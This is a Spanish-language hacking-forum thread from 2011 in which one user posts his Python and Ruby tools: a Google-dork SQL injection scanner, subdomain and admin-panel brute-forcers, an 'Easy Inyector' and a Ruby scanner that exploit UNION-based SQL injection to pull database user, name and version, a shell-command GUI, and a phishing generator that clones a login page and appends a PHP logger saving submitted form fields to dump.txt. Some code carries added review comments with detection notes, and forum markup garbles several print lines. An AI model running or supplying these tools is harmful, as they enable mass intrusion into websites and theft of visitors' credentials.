
Temas - BigBear

381
Python / [Python] Google Inyector By dODDY h
« en: Julio 03, 2011, 09:34:58 pm »
Bueno , acabo de hacer un scanner de sqli.

Este busca en Google páginas con un dork indicado por ustedes, para después borrar las repetidas y escanear las webs encontradas.


Código: Python
  1. #!usr/bin/python
  2. #Google Iny (C) Doddy Hackman 2011
  3.  
  4.  
  5. import urllib2,re,os,sys
  6.  
  7.  
  8. def head():
  9.  print "\n\n -- == Google Iny == --\n"
  10.  
  11. def copyright():
  12.  print "\n(C) Doddy Hackman 2011\n"
  13.  sys.exit(1)
  14.  
  15.  
  16. def toma(web) :
  17.  nave = urllib2.Request(web)
  18.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  19.  op = urllib2.build_opener()
  20.  return op.open(nave).read()
  21.  
  22.  
  23. def show():
  24.  print "\n<ul class="bbc_list"><li type="square"> Sintax : ",sys.argv[0]," <dork> <count>\n"[/li][/list]
  25.  
  26. def limpiar(pag):
  27.  
  28.  limpia = []
  29.  for p in pag:
  30.   if not (re.findall("[url]http://www.google.com.ar[/url]",p,re.I)):
  31.    if p not in limpia:
  32.     limpia.append(p)
  33.  return limpia
  34.  
  35.  
  # Probe every collected URL that has a query parameter for an error-based
  # SQL injection signal.
  #
  # Each URL is cut after its first "=" (the original value and any later
  # parameters are dropped), the fixed probe "-1+union+select+1--" is appended,
  # and the page is fetched with toma(). A hit is printed when the response
  # body contains MySQL's "different number of columns" error, matched
  # case-insensitively. Requests that raise are skipped silently by the bare
  # except.
  #
  # NOTE(review): the check only fires on sites that return raw database
  # errors to the client. On the receiving side the probe is a GET whose query
  # string carries the literal "union+select"; parameterised queries and a
  # generic error page take away both the flaw and the signal.
  36. def sql(webs):
  37.  for web in webs :
  38.   if re.findall("=",web):
  39.    web = re.split("=",web)
  40.    web = web[0]+"="
  41.    try:
  42.     code = toma(web+"-1+union+select+1--")
  43.     if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  44.      print "[SQLI] : ",web,"\n"
  45.    except:
  46.     pass
  47.  
  # Collect result links for a search query (dork) from successive Google
  # result pages and return them de-duplicated by limpiar().
  #
  # The start offset s begins at 10 and grows by 10 per page while
  # s <= int(count). Links are taken from the page HTML with a look-behind
  # regex; presumably it matched Google's result markup at the time of
  # posting (2011) - verify before relying on it. Any exception while
  # fetching or parsing calls copyright(), which exits the process.
  #
  # NOTE(review): the [url]...[/url] tags inside the search URL string look
  # like forum BBCode added when the listing was posted, not part of the
  # original string. dork is concatenated into the URL without URL-encoding.
  48. def scan(dork,count):
  49.  pag = []
  50.  s = 10  
  51.  while s <= int(count):
  52.   try:
  53.    code = toma("[url]http://www.google.com.ar/search?hl=&q=[/url]"+str(dork)+"&start="+repr(s))
  54.    d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
  55.    s += 10
  56.    for a in d:
  57.     pag.append(a)
  58.   except:
  59.    copyright()
  60.  pag = limpiar(pag)
  61.  
  62.  return pag
  63.  
  64. head()
  65.  
  66. if len(sys.argv) != 3:
  67.  show()
  68. else :
  69.  print "\n</li><li type="square"> SQL Scan Started\n"[/li][/list]
  70.  print "</li><li type="square"> Dork : ",sys.argv[1][/li][/list]
  71.  print "</li><li type="square"> Count : ",sys.argv[2][/li][/list]
  72.  pages = scan(sys.argv[1],sys.argv[2])
  73.  print "\n</li><li type="square"> Webs Found : ",len(pages),"\n"[/li][/list]
  74.  sql(pages)
  75.  
  76. copyright()
  77.  

382
Python / [Python] Fuzz DNS By Doddy H
« en: Julio 03, 2011, 09:34:47 pm »
Hola a todos.

Acá les dejo un simple buscador de DNS: solo ponen el dominio y esta cosita se encarga de buscarlos.

Código: Python
  1. #!usr/bin/python
  2. #LFI T00l (C) Doddy Hackman
  3.  
  4. import os,sys,urllib2,re
  5.  
  6. dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']
  7.  
  8. def header() :
  9.  print "\n--== Fuzz DNS ==--\n"
  10.  
  11. def copyright() :
  12.  print "\n\n(C) Doddy Hackman 2010\n"
  13.  exit(1)
  14.  
  15. def show() :
  16.  print "\n<ul class="bbc_list"><li type="disc"> Sintax : ",sys.argv[0]," <web>\n"[/li][/list]
  17.  
  18. def toma(web) :
  19.  return urllib2.urlopen(web).read()
  20.  
  21.  
  # Try http://<label>.<web> for each label in the module-level dns list and
  # print the names that could be fetched. A name counts as found when
  # toma() (urllib2.urlopen) returns without raising.
  # The try encloses the whole loop, so the first exception ends the search
  # and is discarded.
  #
  # NOTE(review): on the defending side this is a burst of lookups for
  # dictionary host names under one zone, visible in resolver or authoritative
  # DNS query logs, followed by HTTP requests to the names that resolve.
  # Internal-only names (intranet, vpn, dev, staging ...) are the reason to keep
  # such records out of the public zone.
  # NOTE(review): the list markup around the first print string is forum
  # rendering residue that replaced a bracketed marker; it is not program text.
  22. def search(web):
  23.  print "\n</li><li type="square"> Searching DNS in",web,"\n"[/li][/list]
  24.  try:
  25.   for d in dns:
  26.    toma("http://"+d+"."+web)
  27.    print "[DNS Link] : http://"+d+"."+web
  28.  except:
  29.   pass
  30.  
  31. header()
  32.  
  33. if len(sys.argv) != 2 :
  34.  show()
  35.  
  36. else :
  37.  search(sys.argv[1])
  38.  
  39. copyright()
  40.  
  41.  
  42. #The End
  43.  


Ejemplo de uso


Código:
C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


  • Searching DNS in google.com

    [DNS Link] : http://www.google.com

    (C) Doddy Hackman 2010





  • 383
    Python / [Python] FTP Manager
    « en: Julio 03, 2011, 09:34:36 pm »
    Hola

    Aca traigo un simple cliente FTP

    Código: Python
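    #!/usr/bin/python
    # FTP Manager 0.2 (C) Doddy Hackman 2011
    #
    # Small interactive FTP client on top of ftplib.
    #
    # Review notes:
    # - Plain FTP carries the login and every transfer unencrypted. Where the
    #   server offers FTPS, ftplib.FTP_TLS takes the same constructor arguments.
    # - The password arrives on the command line, so it is readable in the
    #   process list and is normally kept in shell history.
    # - The forum rendering replaced the bracketed marker at the start of the
    #   status messages with list markup; "[+]" is assumed here.

    from ftplib import FTP, all_errors
    import sys

    try:
        read_line = raw_input  # Python 2: returns the typed text unevaluated
    except NameError:
        read_line = input  # Python 3: input() is already text-only


    def head():
        """Print the program banner."""
        print("\n -- == FTP Manger == --\n\n")


    def copyright():
        """Print the copyright footer and end the process (exit status 1, as before)."""
        print("\n\n(C) Doddy Hackman 2011\n")
        sys.exit(1)


    def show():
        """Print the command-line usage."""
        print("\nSintax : " + sys.argv[0] + " <host> <user> <pass>\n")


    def menu():
        """Print the option list and return the chosen option as an int.

        Returns 0, which matches no option, when the entry is not a number.
        The earlier version read the choice with Python 2 input(), which
        evaluates whatever is typed as a Python expression; the choice is now
        read as text and converted explicitly.
        """
        print("\n")
        print("1 : dir")
        print("2 : cwd")
        print("3 : chdir")
        print("4 : delete dir")
        print("5 : delete file")
        print("6 : rename file")
        print("7 : make directory")
        print("8 : size")
        print("9 : abort\n\n")
        try:
            return int(read_line("[Option] : "))
        except ValueError:
            return 0


    def enter(host, user, password):
        """Log in to *host* and serve menu options until option 9 is chosen.

        A failed connection or login is reported and the function returns.
        Errors raised by an individual FTP command are printed and the menu is
        shown again; they are no longer swallowed silently.
        """
        print("[+] Connecting to  %s \n" % host)
        try:
            session = FTP(host, user, password)
        except all_errors as err:
            print("\n[-] %s\n" % err)
            return
        print("\n[+] Enter in the system\n")

        # A loop replaces the former self-recursive menu2(), which added a stack
        # frame for every option chosen.
        while True:
            op = menu()

            if op == 9:
                try:
                    session.quit()
                except all_errors:
                    session.close()  # server already gone; just drop the socket
                copyright()

            try:
                if op == 1:
                    # FTP.dir() prints the listing itself and returns None, so
                    # there is nothing to iterate over.
                    session.dir()
                elif op == 2:
                    print("\n\n[+] Path : " + session.pwd() + "\n\n")
                elif op == 3:
                    session.cwd(read_line("\n\n[Directory] : "))
                    print("\n\n[+] Directory Changed\n\n")
                elif op == 4:
                    session.rmd(read_line("\n\n[Directory] : "))
                    print("\n\n[+] Directory Deleted\n\n")
                elif op == 5:
                    session.delete(read_line("\n\n[File] : "))
                    print("\n\n[+] File Deleted\n\n")
                elif op == 6:
                    old_name = read_line("\n\n[Name] : ")
                    new_name = read_line("\n[New Name] : ")
                    session.rename(old_name, new_name)
                    print("\n\n[+] Name Changed\n\n")
                elif op == 7:
                    session.mkd(read_line("\n\n[New Directory] : "))
                    print("\n\n[+] Directory Created\n\n")
                elif op == 8:
                    # FTP.size() reports bytes; the old message labelled it KB.
                    weight = session.size(read_line("\n\n[File] : "))
                    print("\n\n[+]  %s bytes \n\n" % weight)
            except all_errors as err:
                print("\n[-] %s\n" % err)


    head()

    if len(sys.argv) != 4:
        show()
    else:
        enter(sys.argv[1], sys.argv[2], sys.argv[3])

    copyright()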

    384
    Python / [Python] Finder Admin By Doddy H
    « en: Julio 03, 2011, 09:34:25 pm »
    Hola a todos.

    Hoy terminé un script en Python para buscar el famoso panel de administración.

    Código: Python
    1. #!usr/bin/python
    2. #Finder Admin (C) Doddy Hackman
    3.  
    4. import sys,httplib,os
    5.  
    6. os.system("cls")
    7.  
    8. panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpa
nel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/'
,'admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    9.  
    10. def header() :
    11.  print "\n--== Finder Admin ==--\n"
    12.  
    13. def copyright() :
    14.  print "\n\n(C) Doddy Hackman 2010\n"
    15.  exit(1)
    16.  
    17. header()
    18.  
    19. def show() :
    20.  print "\n<ul class="bbc_list"><li type="disc"> Sintax : ",sys.argv[0]," <web>\n"[/li][/list]
    21.  
    22. def toma(web,path):
    23.  nave = httplib.HTTPConnection(web)
    24.     nave.request("GET","/"+path)
    25.  return nave.getresponse().status  
    26.  
    # Request "/" + path on host web for every entry in the module-level panels
    # list and print the paths that answer with HTTP status 200.
    # KeyboardInterrupt ends the run through copyright(); every other exception
    # is ignored and the loop moves on to the next path.
    #
    # NOTE(review): in access logs this is a fast run of GETs for administrative
    # paths from a single client, most of them answered 404, which is a pattern
    # log alerting and rate limiting can key on. A 200 here means only that the
    # path answered; whether the panel is protected depends on its
    # authentication.
    # NOTE(review): the list markup around the first print string is forum
    # rendering residue that replaced a bracketed marker; it is not program text.
    27. def buscar(web):
    28.  print "\n</li><li type="square"> Target : ",web,"\n\n"[/li][/list]
    29.  for path in panels:
    30.   try:
    31.    code = toma(web,path)
    32.    if code ==200:
    33.     print "[Link] : "+web+"/"+path
    34.   except(KeyboardInterrupt):
    35.    copyright()
    36.   except:
    37.    pass
    38.  
    39. if len(sys.argv) != 2 :
    40.  show()
    41.  
    42. else:
    43.  buscar(sys.argv[1])
    44.  
    45. copyright()
    46.  
    47.  
    48. #The End
    49.  

    Un ejemplo de uso seria

    Código:
    python finder.py 127.0.0.1

    Código:
    --== Finder Admin ==--


  • Target :  127.0.0.1


    [Link] : 127.0.0.1/admin/
    [Link] : 127.0.0.1/login.php
    [Link] : 127.0.0.1/phpmyadmin/


    (C) Doddy Hackman 2010

    Eso sí, no usen http:// en la web que quieran escanear; pasen solo el host, como en el ejemplo de arriba (127.0.0.1).


  • 385
    Python / [Python] Easy Inyector By Doddy H
    « en: Julio 03, 2011, 09:34:16 pm »
    Bueno, esta es la primera versión de este simple programa que hice en Perl; en
    la siguiente versión le agregaré otras cosas y podrá escanear varios en un archivo de texto.

    Esta cosa busca:

    * Vulnerabilidad (obvio)
    * Limite de columnas
    * Informacion sobre la base de datos
    * Automaticamente buscar el numero que permite mostrar informacion
    * Verifica existencia de mysql.user y information.schema.tables



    Código: Python
    1. #!usr/bin/python
    2. #Easy Inyector (C) Doddy Hackman 2010
    3.  
    4. import os,sys,urllib2,re
    5.  
    6.  
    7. def clean():
    8.  if sys.platform=="win32":
    9.   os.system("cls")
    10.  else:
    11.   os.system("clear")
    12.  
    13.  
    14. def header() :
    15.  print "\n--== Easy Inyector ==--\n"
    16.  
    17. def copyright() :
    18.  print "\n\n(C) Doddy Hackman 2010\n"
    19.  sys.exit(1)
    20.  
    21. def show() :
    22.  print "\n<ul class="bbc_list"><li type="disc"> Sintax : ",sys.argv[0]," <web>\n"[/li][/list]
    23.  
    24. def toma(web) :
    25.  return urllib2.urlopen(web).read()
    26.  
    27. def bypass(bypass):
    28.  if bypass == "--":
    29.   return("+","--")
    30.  elif bypass == "/*":
    31.   return("/**/","/*")
    32.  else:
    33.   return("+","--")
    34.  
    # Read identifying data through an injection point and test which system
    # tables the database account can read. Called from findlength().
    #
    # web is the UNION SELECT URL in which one column holds the placeholder
    # "hackman". The placeholder is replaced by a concat() of user(), database()
    # and version() wrapped in hex-encoded markers: 0x334d50335a3452 is
    # "3MP3Z4R" and 0x4b30425241 is "K0BRA". The response is split on those
    # markers to print the three values. Two further requests append
    # "from mysql.user" and "from information_schema.tables"; a "K0BRA" in the
    # response is taken to mean the table is readable.
    # No exception is handled here; the try around scan() at script level ends
    # the run on any failure.
    #
    # NOTE(review): for detection, the hex marker constants in a query string
    # and the strings "3MP3Z4R" / "K0BRA" in a response body are stable
    # indicators of this tool. A web application account with no rights on the
    # mysql schema makes the mysql.user check fail.
    # NOTE(review): the list markup inside the print lines is forum rendering
    # residue that replaced a bracketed marker; it is not program text.
    35. def more(web,passx):
    36.  pass1,pass2 = bypass(passx)
    37.  print "\n</li><li type="square"> Searching more data\n"[/li][/list]
    38.  web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
    39.  code0 = toma(web1)
    40.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
    41.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
    42.   datar = re.split("K0BRA",datax[0])
    43.   print "</li><li type="square"> Username :",datar[1][/li][/list]
    44.   print "</li><li type="square"> Database :",datar[2][/li][/list]
    45.   print "</li><li type="square"> Version :",datar[3],"\n"[/li][/list]
    46.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    47.  if (re.findall("K0BRA",code1)):
    48.    print "</li><li type="square"> mysql.user : on" [/li][/list]
    49.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    50.  if (re.findall("K0BRA",code2)):
    51.    print "</li><li type="square"> information_schema.tables : on"[/li][/list]
    52.  
    53. def findlength(web,passx):
    54.  pass1,pass2 = bypass(passx)
    55.  print "\n</li><li type="square"> Finding columns length"[/li][/list]
    56.  number = "concat(0x4b30425241,1,0x4b30425241)"
    57.  for te in range(2,30):
    58.   number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
    59.   code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
    60.   if (re.findall("K0BRA(.*?)K0BRA",code)):
    61.    numbers = re.findall("K0BRA(.*?)K0BRA",code)  
    62.    print "</li><li type="square"> Column length :",te[/li][/list]
    63.    print "</li><li type="square"> Numbers",numbers,"print data"[/li][/list]
    64.    sql = ""
    65.    tex = te + 1
    66.    for sqlix in range(2,tex):
    67.     sql = str(sql)+","+str(sqlix)
    68.     sqli  = str(1)+sql
    69.    sqla = re.sub(numbers[0],"hackman",sqli)
    70.    more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
    71.    print "\n</li><li type="square"> Scan Finished\n"[/li][/list]
    72.    sys.exit(1)
    73.  print "[-] Length dont found\n"
    74.    
    75.    
    # First check of the run: request web followed by "-1 union select 1" (the
    # separators and the trailing comment token come from bypass(passx)) and
    # look for MySQL's column-count error in the body, case-insensitively.
    # On a match findlength() continues the run; otherwise the script prints
    # "Not Vulnerable" and exits through copyright().
    #
    # NOTE(review): the test depends entirely on the application echoing the
    # database error text. A site that is injectable but shows a generic error
    # page is reported as not vulnerable, so a negative result from this check
    # is not evidence that the input is handled safely.
    # NOTE(review): the list markup inside the print lines is forum rendering
    # residue that replaced a bracketed marker; it is not program text.
    76. def scan(web,passx):
    77.  pass1,pass2 = bypass(passx)
    78.  print "\n</li><li type="square"> Testing vulnerability"[/li][/list]
    79.  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    80.  if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
    81.   print "</li><li type="square"> SQLI Detected"[/li][/list]
    82.   findlength(web,passx)
    83.  else:
    84.   print "[-] Not Vulnerable"
    85.   copyright()
    86.  
    87.  
    88. header()
    89.  
    90. if len(sys.argv) != 2 :
    91.  show()
    92.  
    93. else :
    94.  try:
    95.   scan(sys.argv[1],"--")
    96.  except:
    97.   copyright()
    98.  
    99.  
    100. #The End
    101.  
    102.  



    Ejemplo de uso

    Código:

    C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


    --== Easy Inyector ==--


  • Testing vulnerability
  • SQLI Detected

  • Finding columns length
  • Column length : 3
  • Numbers ['1', '2', '3'] print data

  • Searching more data

  • Username : [email protected]
  • Database : hackman
  • Version : 5.1.41

  • mysql.user : on
  • information_schema.tables : on

  • Scan Finished



    (C) Doddy Hackman 2010




  • 386
    Python / [Python] Console By Doddy H
    « en: Julio 03, 2011, 09:34:00 pm »
    Bueno este es un simple ejecutor de comandos hecho en tk

    Código: Python
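    #!/usr/bin/python
    # Console (C) Doddy Hackman 2011
    #
    # Tk front end that runs one shell command per button press and shows its
    # output in a text panel.

    try:
        from Tkinter import *  # Python 2
    except ImportError:
        from tkinter import *  # Python 3
    import subprocess


    def execa():
        """Run the text of the Command box through the shell and show the result.

        Standard output is appended to the panel, followed by standard error
        when there is any. The window does not respond while the command runs.

        shell=True is deliberate: the box is meant to accept a full shell
        command line typed by the local user. The text must never come from
        any other source, because it is executed exactly as given.
        """
        proc = subprocess.Popen(
            cmd.get(),
            shell=True,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            universal_newlines=True,
        )
        # communicate() closes stdin and drains both pipes together. The old
        # code tested the Popen object itself, which is always true, so stderr
        # was never shown, and reading stdout alone could block once the
        # stderr pipe filled up.
        out, err = proc.communicate()
        panel.insert(END, out)
        if err:
            panel.insert(END, err)


    window = Tk()
    window.title("Console (C) Doddy Hackman 2011")

    # Equal minimum and maximum sizes keep the window at a fixed 400x320.
    window.maxsize(width="400", height="320")
    window.minsize(width="400", height="320")

    window.configure(background="black")
    window.configure(cursor="tcross")

    cmd = StringVar()
    panel = Text(window, width=30, height=15, bg="black", fg="green")

    Label(window, bg="black").grid(row=1)
    Label(window, text="Command : ", bg="black", fg="green").grid(row=3, column=4)

    # grid() returns None, so the result is not kept; the entry is read
    # through the cmd variable.
    Entry(window, width=35, textvariable=cmd, bg="black", fg="green").grid(row=3, column=5)

    Button(window, text="Cargar", bg="black", fg="green", activebackground="green", command=execa).grid(row=3, column=9)

    Label(window, bg="black").grid(row=4)
    panel.grid(row=10, column=5)

    window.mainloop()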

    387
    Ruby / [Ruby] SQLI Scanner
    « en: Julio 03, 2011, 09:33:07 pm »
    Un scanner de SQLI en ruby

    Código: Ruby
    1. #!usr/bin/ruby
    2. #SQLI Scannerl (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. require 'net/http'
    6.  
    7.  
    8. def uso
    9.   print "\n<ul class="bbc_list"><li type="square"> sqli.rb <site>\n"[/li][/list]
    10. end
    11.  
    12. def toma(host,path)
    13.   http = Net::HTTP.new(host,80)
    14.   return http.get(path).body
    15. end
    16.  
    17. def details(web,more)
    18. web1 = more.sub(/hackman/,"0x4b30425241")
    19. more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
    20. print "\n\n</li><li type="square"> Extrating information of the DB\n\n"[/li][/list]
    21. url = URI.parse(web)
    22. code = toma(url.host,url.path+"?"+url.query+more)
    23. if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
    24.   print "[username] : "+$1+"\n"
    25.   print "[database] : "+$2+"\n"
    26.   print "[version] : "+$3+"\n\n"
    27.  
    28. test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
    29. test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")
    30.  
    31. if test1=~/K0BRA/
    32.   print "[information_schema.tables] : ON\n"
    33. end
    34.  
    35. if test2=~/K0BRA/
    36.  print "[mysql.user] : ON"
    37. end
    38.  
    39.  
    40. else
    41.   print "\n[-] Not Found\n\n"
    42. end
    43. end
    44.  
    45.  
    46. def scan(web)
    47. print "\n</li><li type="square"> Testing the vulnerability SQLI...\n\n"[/li][/list]
    48. url = URI.parse(web)
    49. codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
    50. if codetest=~/The used SELECT statements have a different number of columns/
    51.   print "</li><li type="square"> SQLI Detected\n\n"[/li][/list]
    52.   else
    53.   print "[-] Not Vulnerable to SQLI\n\n"
    54.   copyright()
    55. end
    56.  
    57. z = "1"
    58. x = "concat(0x4b30425241,1,0x4b30425241)"
    59. for num in ('2'..'25')
    60. z = z+","+num
    61. x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    62. #print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
    63. code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
    64. if code=~/K0BRA(.*?)K0BRA/
    65. print "</li><li type="square"> The Page has "+num+" columns\n"[/li][/list]
    66. print "</li><li type="square"> The number "+$1+" print data\n\n"[/li][/list]
    67. z = z.sub($1,"hackman")
    68. print "[SQLI] : "+web+"-1+union+select+"+z
    69. details(web,"-1+union+select+"+z)
    70. copyright()
    71. end
    72. end
    73. print "\n\n[-] Not Found the numbers of the columns\n\n"
    74. copyright()
    75. end
    76.  
    77. def head()
    78.   print "\n\n -- == SQLI Scanner == --\n\n"
    79. end
    80.  
    81. def copyright()
    82.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    83.    exit(1)
    84.  end
    85.  
    86. head()
    87. if !ARGV[0]
    88.   uso()
    89. else
    90.   scan(ARGV[0])
    91.   copyright()  
    92. end
    93. copyright()
    94.  
    95. #The End ?
    96.  

    388
    Ruby / [Ruby] Phishing Gen
    « en: Julio 03, 2011, 09:32:52 pm »
    Un generador de fakes

    Código: Ruby
    1. #!usr/bin/ruby
    2. #PHishing Gen (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. require 'net/http'
    6.  
    7. def uso
    8.   print "\n<ul class="bbc_list"><li type="square"> fake.rb <site> <result>\n"[/li][/list]
    9. end
    10.  
    11. def toma(web)
    12.    return Net::HTTP.get(web)
    13.    end
    14.  
    15. def savefile(filename,text)
    16. files = File.open(filename,'a')
    17. files.puts text
    18. end
    19.  
    20. def gen(web,file,magic)
    21.   print "\n\n</li><li type="square"> Getting the source...\n"[/li][/list]
    22.   begin
    23.   code = toma(URI.parse(web))
    24.   savefile(file,code+"\n"+magic)
    25.   print "</li><li type="square"> Finish"[/li][/list]
    26.   copyright()
    27.   end
    28. end
    29.  
    30. def head()
    31.   print "\n\n -- == Phising Gen == --\n\n"
    32. end
    33.  
    34. def copyright()
    35.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    36.    exit(1)
    37.  end
    38.  
    # Script entry. The usage text is shown only when both arguments are absent;
    # otherwise gen() downloads the page at ARGV[0] and appends its source,
    # followed by `text`, to the file named by ARGV[1].
    #
    # `text` is a PHP block that appends every POST and GET parameter as
    # name=value lines to dump.txt, opened by relative path in append mode.
    #
    # NOTE(review): for incident response the artefacts are a copied login page
    # ending in a PHP block of this shape and a dump.txt next to it holding
    # submitted form fields in clear text; both are worth searching for on a
    # web root suspected of hosting a cloned page.
    39. head()
    40. if !ARGV[0] and !ARGV[1]
    41.   uso()
    42. else
    43.   text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
    44.   gen(ARGV[0],ARGV[1],text)  
    45. end
    46. copyright()
    47.  
    48.  

    389
    Ruby / [Ruby] Panel Control
    « en: Julio 03, 2011, 09:32:42 pm »
    Un buscador de panel de administracion

    Código: Ruby
    1. #!usr/bin/ruby
    2. #Panel cONTROL (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
